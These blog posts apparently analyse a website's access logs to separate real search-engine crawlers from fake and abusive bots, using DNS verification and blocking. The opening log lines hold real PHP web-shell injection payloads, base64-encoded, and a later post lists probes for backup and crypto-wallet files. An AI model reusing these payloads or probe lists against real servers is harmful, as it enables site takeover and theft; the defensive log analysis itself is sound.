106.52.197.96 - - [15/Sep/2019:20:00:24 -0700] "GET //index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW3NoZWxsXSk7Pz5ibHNoZWxs HTTP/1.1" 404 4698 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:24 -0700] "GET //uploadfile/member/0/0x0.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:29 -0700] "POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:33 -0700] "GET //index.php/list/5/?current={pboot:if(eval\\($_GET['a']))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydibCddKTsgPz5ibHNoZWxs')) HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:33 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:37 -0700] "POST //index.php?c=upload&f=save HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:41 -0700] "POST //index.php?g=Api&m=Plugin&a=fetch HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

MegaIndex.ru/2.0 megaindex.com/crawler

IP addresses

While examining the access.log at freefixer.com I found around 1000 hits from a bot named MegaIndex.ru operating from the 144.76.27.118 IP address:

144.76.27.118 - - [03/Sep/2019:23:15:50 -0700] "GET /library/file/hkcmd.exe-188/ HTTP/1.1" 200 19377 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"

Unfortunately, MegaIndex.ru’s crawler page does not clearly explain why it is a good idea to let the bot crawl my site. Nor does it clearly explain what user User-agent name to use in order to explicitly delay or disallow the bot. In addition to this, it sounds as the maximum value for Crawl-delay is 5 seconds.

I hope that the 5 seconds max value is just a typo. I’m going to try to slow down or block the bot with the following entries in robots.txt:

User-agent: MegaIndex.ru
Crawl-delay: 3600

or

User-agent: MegaIndex.ru
Disallow: /

I did a reverse IP lookup on 144.76.27.118 and the bot is running at clients.your-server.de.

144.76.27.118 reverse ip lookup

I tried a few geolocation services and all report that the 144.76.27.118 server is located in Germany.

Update 24 hours later: When checking the logs again I noticed that MegaCrawler had done more than 6000 requests. That is unacceptable. I’m blocking 144.76.27.118 in the .htaccess file.

66.249.79.159 – Googlebot/2.1

IP addresses

You can add 66.249.79.159 to your whitelist right away. 66.249.79.159 belongs to Google and the bot operating from there is the real GoogleBot.

If you prefer to verify that 66.249.79.159 belongs to Google, you can launch a command shell and do a reverse IP lookup on 66.249.79.159 and then a forward DNS lookup on the host name returned from the reverse lookup:

As you can see the reverse lookup returns a .googlebot.com address, and the forward DNS requests brings us back with 66.249.79.159. We can now conclude that 66.249.79.159 is a real Googlebot.

For the last days I’ve been going through all traffic on the Freefixer.com web site. My goal is to reduce the traffic to the web site by blocking a bunch for uninvited bots and crawlers. I’ll try to share some of the result here and I hope you’ll find it useful.

142.252.249.27 is Scanning for Crypto Wallets and Backups

hacking, IP addresses, , , ,

Found a log entry from 142.252.249.27 this morning:

142.252.249.27 - - [09/Sep/2019:07:59:18 -0700] "HEAD /backup.zip HTTP/1.1" 404 4128 "http://www.freefixer.com/backup.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

The bot running at 142.252.249.27 is scanning freefixer.com for backups, databases, data, code, bitcoin wallets, bitcoin cash wallets, litecoin wallets, dogecoin wallets, etc. It looks for various file formats such as .zip, .rar, .dat, .7z, .sql, .mdb, .mdf, .tgz, .tar and .sql. Here’s the complete lite of requests that 142.252.249.27 did: 

 HEAD /backup.zip
 HEAD /backup.rar
 HEAD /backup.dat
 HEAD /backup.7z
 HEAD /backup.sql
 HEAD /backup.mdb
 HEAD /backup.mdf
 HEAD /backup.tgz
 HEAD /backup.tar.gz
 HEAD /db.zip
 HEAD /db.rar
 HEAD /db.dat
 HEAD /db.7z
 HEAD /db.sql
 HEAD /db.mdb
 HEAD /db.mdf
 HEAD /db.tgz
 HEAD /db.tar.gz
 HEAD /web.zip
 HEAD /web.rar
 HEAD /web.dat
 HEAD /web.7z
 HEAD /web.sql
 HEAD /web.mdb
 HEAD /web.mdf
 HEAD /web.tgz
 HEAD /web.tar.gz
 HEAD /database.zip
 HEAD /database.rar
 HEAD /database.dat
 HEAD /database.7z
 HEAD /database.sql
 HEAD /database.mdb
 HEAD /database.mdf
 HEAD /database.tgz
 HEAD /database.tar.gz
 HEAD /data.zip
 HEAD /data.rar
 HEAD /data.dat
 HEAD /data.7z
 HEAD /data.sql
 HEAD /data.mdb
 HEAD /data.mdf
 HEAD /data.tgz
 HEAD /data.tar.gz
 HEAD /web.zip
 HEAD /web.rar
 HEAD /web.dat
 HEAD /web.7z
 HEAD /web.sql
 HEAD /web.mdb
 HEAD /web.mdf
 HEAD /web.tgz
 HEAD /web.tar.gz
 HEAD /wwwroot.zip
 HEAD /wwwroot.rar
 HEAD /wwwroot.dat
 HEAD /wwwroot.7z
 HEAD /wwwroot.sql
 HEAD /wwwroot.mdb
 HEAD /wwwroot.mdf
 HEAD /wwwroot.tgz
 HEAD /wwwroot.tar.gz
 HEAD /www.zip
 HEAD /www.rar
 HEAD /www.dat
 HEAD /www.7z
 HEAD /www.sql
 HEAD /www.mdb
 HEAD /www.mdf
 HEAD /www.tgz
 HEAD /www.tar.gz
 HEAD /code.zip
 HEAD /code.rar
 HEAD /code.dat
 HEAD /code.7z
 HEAD /code.sql
 HEAD /code.mdb
 HEAD /code.mdf
 HEAD /code.tgz
 HEAD /code.tar.gz
 HEAD /test.zip
 HEAD /test.rar
 HEAD /test.dat
 HEAD /test.7z
 HEAD /test.sql
 HEAD /test.mdb
 HEAD /test.mdf
 HEAD /test.tgz
 HEAD /test.tar.gz
 HEAD /admin.zip
 HEAD /admin.rar
 HEAD /admin.dat
 HEAD /admin.7z
 HEAD /admin.sql
 HEAD /admin.mdb
 HEAD /admin.mdf
 HEAD /admin.tgz
 HEAD /admin.tar.gz
 HEAD /user.zip
 HEAD /user.rar
 HEAD /user.dat
 HEAD /user.7z
 HEAD /user.sql
 HEAD /user.mdb
 HEAD /user.mdf
 HEAD /user.tgz
 HEAD /user.tar.gz
 HEAD /sql.zip
 HEAD /sql.rar
 HEAD /sql.dat
 HEAD /sql.7z
 HEAD /sql.sql
 HEAD /sql.mdb
 HEAD /sql.mdf
 HEAD /sql.tgz
 HEAD /sql.tar.gz
 HEAD /wallet.zip
 HEAD /wallet.rar
 HEAD /wallet.dat
 HEAD /wallet.7z
 HEAD /wallet.sql
 HEAD /wallet.mdb
 HEAD /wallet.mdf
 HEAD /wallet.tgz
 HEAD /wallet.tar.gz
 HEAD /wallet.backup.zip
 HEAD /wallet.backup.rar
 HEAD /wallet.backup.dat
 HEAD /wallet.backup.7z
 HEAD /wallet.backup.sql
 HEAD /wallet.backup.mdb
 HEAD /wallet.backup.mdf
 HEAD /wallet.backup.tgz
 HEAD /wallet.backup.tar.gz
 HEAD /litecoin.zip
 HEAD /litecoin.rar
 HEAD /litecoin.dat
 HEAD /litecoin.7z
 HEAD /litecoin.sql
 HEAD /litecoin.mdb
 HEAD /litecoin.mdf
 HEAD /litecoin.tgz
 HEAD /litecoin.tar.gz
 HEAD /Litecoin.zip
 HEAD /Litecoin.rar
 HEAD /Litecoin.dat
 HEAD /Litecoin.7z
 HEAD /Litecoin.sql
 HEAD /Litecoin.mdb
 HEAD /Litecoin.mdf
 HEAD /Litecoin.tgz
 HEAD /Litecoin.tar.gz
 HEAD /Bitcoin.zip
 HEAD /Bitcoin.rar
 HEAD /Bitcoin.dat
 HEAD /Bitcoin.7z
 HEAD /Bitcoin.sql
 HEAD /Bitcoin.mdb
 HEAD /Bitcoin.mdf
 HEAD /Bitcoin.tgz
 HEAD /Bitcoin.tar.gz
 HEAD /bitcoin.zip
 HEAD /bitcoin.rar
 HEAD /bitcoin.dat
 HEAD /bitcoin.7z
 HEAD /bitcoin.sql
 HEAD /bitcoin.mdb
 HEAD /bitcoin.mdf
 HEAD /bitcoin.tgz
 HEAD /bitcoin.tar.gz
 HEAD /HShare.zip
 HEAD /HShare.rar
 HEAD /HShare.dat
 HEAD /HShare.7z
 HEAD /HShare.sql
 HEAD /HShare.mdb
 HEAD /HShare.mdf
 HEAD /HShare.tgz
 HEAD /HShare.tar.gz
 HEAD /btc.zip
 HEAD /btc.rar
 HEAD /btc.dat
 HEAD /btc.7z
 HEAD /btc.sql
 HEAD /btc.mdb
 HEAD /btc.mdf
 HEAD /btc.tgz
 HEAD /btc.tar.gz
 HEAD /bch.zip
 HEAD /bch.rar
 HEAD /bch.dat
 HEAD /bch.7z
 HEAD /bch.sql
 HEAD /bch.mdb
 HEAD /bch.mdf
 HEAD /bch.tgz
 HEAD /bch.tar.gz
 HEAD /btm.zip
 HEAD /btm.rar
 HEAD /btm.dat
 HEAD /btm.mdb
 HEAD /btm.mdf
 HEAD /btm.tgz
 HEAD /btm.tar.gz
 HEAD /bcd.zip
 HEAD /bcd.rar
 HEAD /bcd.dat
 HEAD /bcd.7z
 HEAD /bcd.sql
 HEAD /bcd.mdb
 HEAD /bcd.mdf
 HEAD /bcd.tgz
 HEAD /bcd.tar.gz
 HEAD /bcx.zip
 HEAD /bcx.rar
 HEAD /bcx.dat
 HEAD /bcx.7z
 HEAD /bcx.sql
 HEAD /bcx.mdb
 HEAD /bcx.mdf
 HEAD /bcx.tgz
 HEAD /bcx.tar.gz
 HEAD /qianbao.zip
 HEAD /qianbao.rar
 HEAD /qianbao.dat
 HEAD /qianbao.7z
 HEAD /qianbao.sql
 HEAD /qianbao.mdb
 HEAD /qianbao.mdf
 HEAD /qianbao.tgz
 HEAD /qianbao.tar.gz
 HEAD /doge.zip
 HEAD /doge.rar
 HEAD /doge.dat
 HEAD /doge.7z
 HEAD /doge.sql
 HEAD /doge.mdb
 HEAD /doge.mdf
 HEAD /doge.tgz
 HEAD /doge.tar.gz
 HEAD /dogecoin.zip
 HEAD /dogecoin.rar
 HEAD /dogecoin.dat
 HEAD /dogecoin.7z
 HEAD /dogecoin.sql
 HEAD /dogecoin.mdb
 HEAD /dogecoin.mdf
 HEAD /dogecoin.tgz
 HEAD /dogecoin.tar.gz
 HEAD /backup.zip
 HEAD /backup.rar
 HEAD /backup.dat
 HEAD /backup.7z
 HEAD /backup.sql
 HEAD /backup.mdb
 HEAD /backup.mdf
 HEAD /backup.tgz
 HEAD /backup.tar.gz
 HEAD /db.zip
 HEAD /db.rar
 HEAD /db.dat
 HEAD /db.7z
 HEAD /db.sql
 HEAD /db.mdb
 HEAD /db.mdf
 HEAD /db.tgz
 HEAD /db.tar.gz
 HEAD /data.zip
 HEAD /data.rar
 HEAD /data.dat
 HEAD /data.7z
 HEAD /data.sql
 HEAD /data.mdb
 HEAD /data.mdf
 HEAD /data.tgz
 HEAD /data.tar.gz
 HEAD /web.zip
 HEAD /web.rar
 HEAD /web.dat
 HEAD /web.7z
 HEAD /web.sql
 HEAD /web.mdb
 HEAD /web.mdf
 HEAD /web.tgz
 HEAD /web.tar.gz
 HEAD /wwwroot.zip
 HEAD /wwwroot.rar
 HEAD /wwwroot.dat
 HEAD /wwwroot.7z
 HEAD /wwwroot.sql
 HEAD /wwwroot.mdb
 HEAD /wwwroot.mdf
 HEAD /wwwroot.tgz
 HEAD /wwwroot.tar.gz
 HEAD /database.zip
 HEAD /database.rar
 HEAD /database.dat
 HEAD /database.7z
 HEAD /database.sql
 HEAD /database.mdb
 HEAD /database.mdf
 HEAD /database.tgz
 HEAD /database.tar.gz
 HEAD /www.zip
 HEAD /www.rar
 HEAD /www.dat
 HEAD /www.7z
 HEAD /www.sql
 HEAD /www.mdb
 HEAD /www.mdf
 HEAD /www.tgz
 HEAD /www.tar.gz
 HEAD /code.zip
 HEAD /code.rar
 HEAD /code.dat
 HEAD /code.7z
 HEAD /code.sql
 HEAD /code.mdb
 HEAD /code.mdf
 HEAD /code.tgz
 HEAD /code.tar.gz
 HEAD /test.zip
 HEAD /test.rar
 HEAD /test.dat
 HEAD /test.7z
 HEAD /test.sql
 HEAD /test.mdb
 HEAD /test.mdf
 HEAD /test.tgz
 HEAD /test.tar.gz
 HEAD /admin.zip
 HEAD /admin.rar
 HEAD /admin.dat
 HEAD /admin.7z
 HEAD /admin.sql
 HEAD /admin.mdb
 HEAD /admin.mdf
 HEAD /admin.tgz
 HEAD /admin.tar.gz
 HEAD /user.zip
 HEAD /user.rar
 HEAD /user.dat
 HEAD /user.7z
 HEAD /user.sql
 HEAD /user.mdb
 HEAD /user.mdf
 HEAD /user.tgz
 HEAD /user.tar.gz
 HEAD /sql.zip
 HEAD /sql.rar
 HEAD /sql.dat
 HEAD /sql.7z
 HEAD /sql.sql
 HEAD /sql.mdb
 HEAD /sql.mdf
 HEAD /sql.tgz
 HEAD /sql.tar.gz
 HEAD /bf.zip
 HEAD /bf.rar
 HEAD /bf.dat
 HEAD /bf.7z
 HEAD /bf.sql
 HEAD /bf.mdb
 HEAD /bf.mdf
 HEAD /bf.tgz
 HEAD /bf.tar.gz
 HEAD /beifen.zip
 HEAD /beifen.rar
 HEAD /beifen.dat
 HEAD /beifen.7z
 HEAD /beifen.sql
 HEAD /beifen.mdb
 HEAD /beifen.mdf
 HEAD /beifen.tgz
 HEAD /beifen.tar.gz
 HEAD /shujuku.zip
 HEAD /shujuku.rar
 HEAD /shujuku.dat
 HEAD /shujuku.7z
 HEAD /shujuku.sql
 HEAD /shujuku.mdb
 HEAD /shujuku.mdf
 HEAD /shujuku.tgz
 HEAD /shujuku.tar.gz
 HEAD /shuju.zip
 HEAD /shuju.rar
 HEAD /shuju.dat
 HEAD /shuju.7z
 HEAD /shuju.sql
 HEAD /shuju.mdb
 HEAD /shuju.mdf
 HEAD /shuju.tgz
 HEAD /shuju.tar.gz
 HEAD /ziliao.zip
 HEAD /ziliao.rar
 HEAD /ziliao.dat
 HEAD /ziliao.7z
 HEAD /ziliao.sql
 HEAD /ziliao.mdb
 HEAD /ziliao.mdf
 HEAD /ziliao.tgz
 HEAD /ziliao.tar.gz
 HEAD /freefixer.zip
 HEAD /freefixer.com.zip
 HEAD /www.freefixer.com.zip
 HEAD /freefixer.rar
 HEAD /freefixer.com.rar
 HEAD /www.freefixer.com.rar
 HEAD /freefixer.dat
 HEAD /freefixer.com.dat
 HEAD /www.freefixer.com.dat
 HEAD /freefixer.7z
 HEAD /freefixer.com.7z
 HEAD /www.freefixer.com.7z
 HEAD /freefixer.sql
 HEAD /freefixer.com.sql
 HEAD /www.freefixer.com.sql
 HEAD /freefixer.mdb
 HEAD /freefixer.com.mdb
 HEAD /www.freefixer.com.mdb
 HEAD /freefixer.mdf
 HEAD /freefixer.com.mdf
 HEAD /www.freefixer.com.mdf
 HEAD /freefixer.tgz
 HEAD /freefixer.com.tgz
 HEAD /www.freefixer.com.tgz
 HEAD /freefixer.tar.gz
 HEAD /freefixer.com.tar.gz
 HEAD /www.freefixer.com.tar.gz

Vanta Telecommunications Limited and egihosting.com are names that shows up then I did a lookup in ARIN register, as shown in the screenshot below. I’m assuming one of their customers have been hacked.

If you’ve been following this blog for the last week you know that I’ve been trying to weed out fake Bingbots, Yandexbots and Googlebots and other types of bad behaviour. Since 142.252.249.27 is currently trying to gain access to non-public information I’m going to block it in Apache’s .htaccess file.

91.121.209.150 – Apache-HttpClient/4.5.5 (Java/1.8.0_101)

IP addresses

I’m currently following up on some of the most frequent visitors at Freefixer.com. This time it’s 91.121.209.150, with the user agent set to Apache-HttpClient/4.5.5 (Java/1.8.0_101).

Unfortunately this bot does not give any details on why they are crawling Freefixer.com and who is operating the bot. All I know is that it downloads one of the .RSS feeds and then start downloading all pages that the .RSS links to with a few seconds delay.

91.121.209.150 - - [07/Sep/2019:16:50:51 -0700] "GET /library/file/295790/ HTTP/1.1" 301 3551 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

 91.121.209.150 - - [07/Sep/2019:16:50:52 -0700] "GET /library/file/esrv_svc.exe-295790/ HTTP/1.1" 200 18461 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

 91.121.209.150 - - [07/Sep/2019:16:50:56 -0700] "GET /library/file/295789/ HTTP/1.1" 301 559 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

 91.121.209.150 - - [07/Sep/2019:16:50:57 -0700] "GET /library/file/soffice.exe-295789/ HTTP/1.1" 200 18666 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

 91.121.209.150 - - [07/Sep/2019:16:50:57 -0700] "GET /library/file/295788/ HTTP/1.1" 301 562 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

 91.121.209.150 - - [07/Sep/2019:16:50:58 -0700] "GET /library/file/QHSafeTray.exe-295788/ HTTP/1.1" 200 25845 "-" "Apache-HttpClient/4.5.5 (Java/1.8.0_101)"

The reverse IP lookup returns an ovh.net address. OVH is a company that offers web hosting, servers and cloud solutions:

91.121.209.150 appears to be located in France, near the border to Belgium.

207.46.13.179 – bingbot/2.0

IP addresses

Recently I’ve been fixing some performance issues due to the behaviour of some web bots. If you are concerned about 207.46.13.179, I’ll let you right away that this a legitimate Bingbot. Here’s an example from the HTTP access log:

207.46.13.179 - - [04/Sep/2019:21:53:15 -0700] "GET /library/file/mustangser532.exe-206653/ HTTP/1.1" 301 4303 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

207.46.13.179 is requesting content from Freefixer.com approximately every 10 seconds. Quite often, but that’s OK. I would like Freefixer.com to appear at bing.com.

So, how do I know that this in fact is a real Bingbot, and not some unwanted program that scrapes my web site? I’ll use the same procedure as recommended over at Bing Webmasters Tools. That is, a reverse IP lookup on the IP address, and then a forward IP lookup on the results from the reverse lookup. If you end up with the same IP that you started with, and the reverse lookup reports a search.msn.com, you can rest assured that you are dealing with a legitimate bingbot.

207.46.13.179 is the real Bingbot from Microsoft

If you do an ARIN lookup on 207.46.13.179, you’ll see that Microsoft owns the range starting from 207.46.0.0 to 207.46.255.255. So I assume you can expect bingbots from all the IP addresses.

GoogleBot, BingBot – Is That Crawler Real or Fake?

IP addresses,

I’m currently running FreeFixer.com on a shared Dreamhost server. Dreamhost has a monitoring service that  keeps an eye on the total resource usage for each user account. If some user consumes to much resources on the server, the monitoring service starts killing off processes for that user and an email report is sent. This is great since it saves me much of the performance problems caused by other users on the same server.

Some time ago, the resource usage for freefixer.com started hitting the limit but I didn’t notice any additional traffic when I examined the Google Analytics report. This led me to investigate Apache’s access.log file. Here are two example entries from the log:

157.55.39.252 - - [25/Jun/2019:02:37:05 -0700] "GET /library/file/UninstallTP.exe-154295/ HTTP/1.1" 200 17986 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
163.172.64.171 - - [25/Jun/2019:02:37:10 -0700] "GET /b/tag/fake-flash-software/ HTTP/1.1" 200 18719 "-" "Barkrowler/0.9 (+http://www.exensa.com/crawl)"

The first entry (157.55.39.252) claims to be the bingbot and the second (163.172.64.171) is a crawler called Barkrowler (exensa.com).

When examining the access.log a bunch of questions are raised:

  1. Let’s say the crawler claims to be BingBot or GoogleBot, but is it the real one coming from one of Google’s or Microsoft’s data centers, or is it a bot that falsely set its user agent to GoogleBot or BingBot?
  2. What about all the other bots out there? Their crawling uses quite a lot of resources, but do they bring any value or users to your web site.
  3. What about all the other high usage IP-numbers that claims to be ordinary users? Are their claims correct, or are they just bots in disguise?

I’ll simply post each IP number that I investigate below and you can check out the details by clicking on it. You can find the list down below.

How To Determine If a Bot is Fake

Let’s say you see an entry in the log coming from 157.55.39.252 and it claims to be bingbot. How can we determine that the traffic is from a real bingbot? We can do this using the following two steps:

1) First we do a reverse DNS lookup using the IP from the log.

$ host 157.55.39.252

252.39.55.157.in-addr.arpa domain name pointer msnbot-157-55-39-252.search.msn.com.

The DNS responds with [msnbot-157-55-39-252.search.msn.com].

2) Then we do a forward DNS lookup on the hostname we got from the reverse lookup.

$ dig +short msnbot-157-55-39-252.search.msn.com

157.55.39.252

So, to summarise: 157.55.39.252 points to [msnbot-157-55-39-252.search.msn.com] which is owned by Microsoft. And the [msnbot-157-55-39-252.search.msn.com] hostname resolves back to 157.55.39.252 which we started with. Excellent, we now know that we are dealing with a legitimate bingbot.

Another way to check if an IP belongs to bingbot, if you don’t have the host and dig command line tools available, is to use Bing’s Verify Bingbot Tool. You simply type in the IP address, in this case 157.55.39.252, and solve the captcha.

Verify bingbot tool reports 157.55.39.252 is a real bingbot
Verify bingbot for 157.55.39.252

I’m not aware of web verification tools for the other search engines such as Google or Yandex. If you know about such a tool, please let me know.

IP Addresses

87.250.224.119 – YandexBot/3.0 – Whitelisted

IP addresses

So what about 87.250.224.119 that identifies as YandexBot/3.0? Is this the legitimate YandexBot or a fake bot? This IP is one of the most frequent visitor to Freefixer.com.

87.250.224.119 verified as YandexBot

As verified in the above screenshot, 87.250.224.119 is indeed the real  YandexBot. You can verify this yourself by first doing a reverse IP lookup, and then a forward IP lookup. The reverse IP lookup returns a name ending with .spider.yandex.com and that name resolves back to 87.250.224.119.

All Yandex crawlers have host names ending with yandex.ru, yandex.net or yandex.com. If the host name does not end with one of these, the robot does not belong to Yandex. In that case, someone is pretending to be a Yandexbot and that is certainly bad behaviour and I would block that IP immediately.

I’ve used the host and dig tools which should be available on most platforms with a linux type shell.

The traffic is coming from Moscow, Russia. I’ve added the 87.250.224.119 IP to my whitelist.